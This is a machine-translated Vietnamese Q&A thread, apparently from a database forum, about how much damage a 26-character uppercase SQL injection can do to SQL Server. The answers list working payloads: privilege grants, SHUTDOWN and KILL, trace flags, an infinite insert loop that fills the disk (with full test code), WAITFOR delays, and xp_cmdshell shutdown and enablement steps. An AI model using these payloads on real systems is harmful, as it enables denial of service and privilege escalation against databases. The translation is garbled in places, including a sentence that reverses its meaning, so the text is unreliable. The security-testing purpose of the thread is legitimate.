SQL Server tiêm - thiệt hại bao nhiêu trong 26 ký tự?

Tôi đang kiểm tra khả năng phục hồi chống lại các cuộc tấn công tiêm chích vào cơ sở dữ liệu SQL Server.

Tất cả các tên bảng trong db là chữ thường và đối chiếu là phân biệt chữ hoa chữ thường, Latin1_General_CS_AS .

Chuỗi tôi có thể gửi được buộc phải viết hoa và có thể dài tối đa 26 ký tự. Vì vậy, tôi không thể gửi BẢNG DROP vì tên bảng sẽ được viết hoa và do đó câu lệnh sẽ thất bại do đối chiếu.

Vậy - thiệt hại tối đa tôi có thể làm trong 26 ký tự là gì?

CHỈNH SỬA

Tôi biết tất cả về các truy vấn được tham số hóa và vv - hãy tưởng tượng rằng người đã phát triển giao diện người dùng xây dựng truy vấn để gửi không sử dụng thông số trong trường hợp này.

Tôi cũng không cố làm bất cứ điều gì bất chính, đây là một hệ thống được xây dựng bởi một người khác trong cùng một tổ chức.

Dễ dàng:

GRANT EXECUTE TO LowlyDBA

Hoặc, tôi đoán trong trường hợp này nó sẽ là

grant execute to lowlydba 

Hãy lựa chọn các biến thể về điều này.

Trong tất cả khả năng bạn có thể kiểm tra điều này ngay bây giờ so với hệ thống hiện tại của bạn, nhưng bất kỳ số lượng thay đổi nhỏ nào trong cơ sở dữ liệu theo thời gian có thể làm mất hiệu lực kiểm tra của bạn. Chuỗi ký tự có thể thay đổi, ai đó có thể tạo một thủ tục lưu trữ chữ thường có tiềm năng phá hủy - bất cứ điều gì. Bạn không bao giờ có thể nói với sự tự tin 100% rằng sẽ không có một cuộc tấn công 26 nhân vật phá hoại mà ai đó có thể xây dựng.

Tôi khuyên bạn nên tìm cách khiến nhà phát triển tuân theo các thực tiễn bảo mật tốt nhất theo tiêu chuẩn cơ bản của ngành, nếu chỉ vì lợi ích của riêng bạn vì một người mà tôi cho là ít nhất phải chịu trách nhiệm một phần nếu vi phạm an ninh xảy ra.

Chỉnh sửa:

Và để độc hại / vui vẻ, bạn có thể thử bật mọi cờ theo dõi. Điều này sẽ rất thú vị để quan sát. Cảm thấy như một bài đăng trên blog Brent Ozar sẽ làm ...

DBCC TRACEON(xxxx, -1)

Cả hai SHUTDOWNlệnh hoặc KILLLệnh (chọn một số ngẫu nhiên trên 50) đều mất ít hơn đáng kể 26 ký tự, mặc dù tài khoản thực thi các truy vấn ứng dụng hy vọng không có đủ quyền để chạy các lệnh này.

Bạn có thể tạo một bảng mà sau đó bạn điền vào cho đến khi hết thời gian hoặc không gian đĩa hết bất cứ khi nào đến trước.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

Tùy thuộc vào định nghĩa thiệt hại của bạn, bạn có thể chạy điều này: WAITFOR DELAY '23: 59 'Để thực sự xấu xa, bạn có thể sử dụng công cụ kiểm tra tải để chạy từ 32.768 khách hàng.

Sự thay đổi dựa trên câu trả lời của @ MikaelEriksson và câu trả lời của @ MartinSmith cho nhận xét ban đầu của tôi:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Ban đầu tôi đã cố gắng thực hiện một câu lệnh WHILE, nhưng điều tốt nhất tôi có thể làm là 27 ký tự:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

Nhưng Martin đã chỉ ra GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO ... gốc rễ của tất cả tà ác và người tạo ra một câu lệnh chèn vòng lặp vô hạn trong 26 ký tự.

Như đã nói ... có thể thuận lợi khi gắn bó với CHAR (99) thay vì int vì điều đó sẽ sử dụng nhiều không gian hơn. Các tùy chọn khác sử dụng tên dài hơn và sẽ phá vỡ giới hạn 26 ký tự ... hoặc sử dụng ít không gian lưu trữ hơn trên mỗi hàng.

Mã kiểm tra đầy đủ:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

Tùy thuộc vào mức độ thiệt hại mà bạn cho là giảm sức mạnh. :-)

Điều này không yêu cầu xp_cmdshell phải được kích hoạt trên máy chủ, một điều không phải là trường hợp của một vài phiên bản SQL Server cuối cùng. Nó cũng yêu cầu tài khoản dịch vụ có quyền tắt, điều này có thể có hoặc không có.

Kích hoạt xp_cmdshell có thể nằm ngoài giới hạn 26 ký tự của bạn. Bạn có cho phép tiêm nhiều lần không?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE